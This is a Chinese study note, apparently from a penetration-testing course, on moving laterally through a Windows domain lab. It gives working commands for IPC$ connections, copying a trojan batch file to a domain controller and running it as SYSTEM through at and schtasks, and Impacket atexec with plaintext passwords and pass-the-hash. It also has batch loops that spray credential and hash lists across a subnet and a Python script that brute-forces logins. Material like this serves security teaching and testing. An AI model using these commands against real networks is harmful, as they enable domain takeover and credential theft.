内网渗透-at&schtasks

内网渗透-at&schtasks

!–看小迪老师的课程自己做的笔记

一、信息收集

1、已经拿下一台内网主机，对域控进行信息收集

net user /domain    #查看域控账号

2、对域控主机名进行ping,查看域控ip

ping 主机名

拿到域控ip：192.168.139.128

3、对域控ip进行namp扫描

nmap -T4 -A -v 192.168.139.128

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Y84gxMNQ-1666782771965)(…/…/img/image-20220402181349877.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mHXMCPiD-1666782771966)(…/…/img/image-20220402181748976.png)]

445端口开放，系统为windows 2012 R2

二、域横向移动【明文】（at&schtasks协议）

1、建立ipc连接

net use \\192.168.139.128\ipc$ "password" /user:domain\administrator  #域内连接
net use \\192.168.139.128\ipc$ "password" /user:administrator       #工作组连接

注意：几种错误连接错误码

（1）5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限

（2）51：网络问题，Windows 无法找到网络路径

（3）53：找不到网络路径，可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有

防火墙等问题

（4）67：找不到网络名，本地 Lanmanworkstation 服务未启动，目标删除 ipc$

（5）1219：提供的凭据和已存在的凭据集冲突，说明已建立 IPC$，需要先删除

（6）1326：账号密码错误

（7）1792：目标 NetLogon 服务未启动，连接域控常常会出现此情况

（8）2242：用户密码过期，目标有账号策略，强制定期更改密码

2、拷贝要执行的命令脚本到域控

dir \\192.168.139.128\C$\    #查看域控c盘目录
copy C:\muma.bat \\192.168.139.128\C$    #复制文件到域控

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ChIfmCru-1666782771967)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402183539779.png)]

3、查看目标时间，定时任务（at&schtasks）

net time /domain     #查看域控时间
at \\192.168.139.128 18:40 C:\muma.bat   #系统小于windows2012
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn adduser /sc DAILY /tr C:\muma.bat /F #系统大于等于windows2012 创建adduser对应执行文件
schtasks /run /s 192.168.139.128 /tn adduser /i  #运行adduser任务

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nwqcQgnw-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402185723553.png)]

4、删除计划任务

schtasks /delete /s 192.168.139.128 /tn adduser /f #删除adduser任务

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yv1r6juD-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190014138.png)]

三、域横向渗透明文HASH传递atexec-impacket

1、使用atexec明文

先删除之前的ipc连接

net use \\192.168.139.128 /del

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VwEKjir6-1666782771969)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190831235.png)]

使用atexec传递明文

atexec.exe 目标用户名:密码@目标ip "执行的命令”
atexec.exe administrator:[email protected] "whoami"    #工作组
atexec.exe GHY/administrator:[email protected] "whoami"  #域

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HJgewCN0-1666782771970)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402191528572.png)]

自动提权到SYSTEM

2、使用atexec 进行传递HASH

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VvIsd35o-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092225030.png)]

NTLM：09731bc87db0aeb71e040f42978b3de1
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 ./[email protected] "whoami"
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 GHY/[email protected] "whoami"
#空格不能少！！！！

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KrYhU83l-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092034994.png)]

四、批量利用

批量获取域内存活ip

for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.139.%i | findstr "TTL="

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2wcp21P1-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402200639098.png)]

批量检测ipc

for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:administrator  #批量检测ip对应的明文连接(工作组)
for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:GHY\administrator
#批量检测ip对应的明文连接（域）

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-arlzJD8t-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402202637032.png)]

for /F %i in (ips.txt) do atexec.exe ./administrator:admin.root.123@%i "whoami" #批量检测ip对应明文回显版(工作组)
for /F %i in (ips.txt) do atexec.exe GHY/administrator:admin.root.123@%i "whoami"
#批量检测ip对应的明文回显版（域）

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EtgOGbrV-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405185658067.png)]

for /F %i in (pass.txt) do atexec.exe ./administrator:%[email protected] "whoami" 
#批量检测明文对应ip回显版（工作组）
for /F %u in (pass.txt) do atexec.exe GHY/administrator:%[email protected] "whoami"
#批量检测明文对应ip回显版（域）

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PoFtfCqD-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405190612253.png)]

for /F %i in (hash.txt) do atexec.exe -hashes :%i ./[email protected] "whoami"
#批量检测hash对应ip回显版（工作组）
for /F %i in (hash.txt) do atexec.exe -hashes :%i GHY/[email protected] "whoami"
#批量检测hash对应的ip回显版（域）

五、整体批量化

#net user \\192.168.139.128\ipc$ "admin.root.123" /user:GHY\administrator
#pip install pyinstaller
#pyinstaller -F ipc.py
import os,time

ipc={
    '192.168.139.1',
    '192.168.139.2',
    '192.168.139.128',
    '192.168.139.131',
    '192.168.139.133'
}

passw={
    'ghy00925',
    'ghy.root',
    'ghy.root.234',
    'ghy.root.123',
    'ghy.root.456',
    'admin.root.123',
    'ghy.haha.925'
}

username={
    'administrator',
    'root',
    'admin',
    'admin123',
    'ghy',
    'gao',
    'gaohongyu',
    'boss'
}

for ip in ipc:
    for passwords in passw:
        for user in username:
            exec = "net use \\" + '\\' + ip + '\ipc$ ' + passwords + ' /user:GHY\\' + user
            print('-->'+exec+'<--')
            os.system(exec);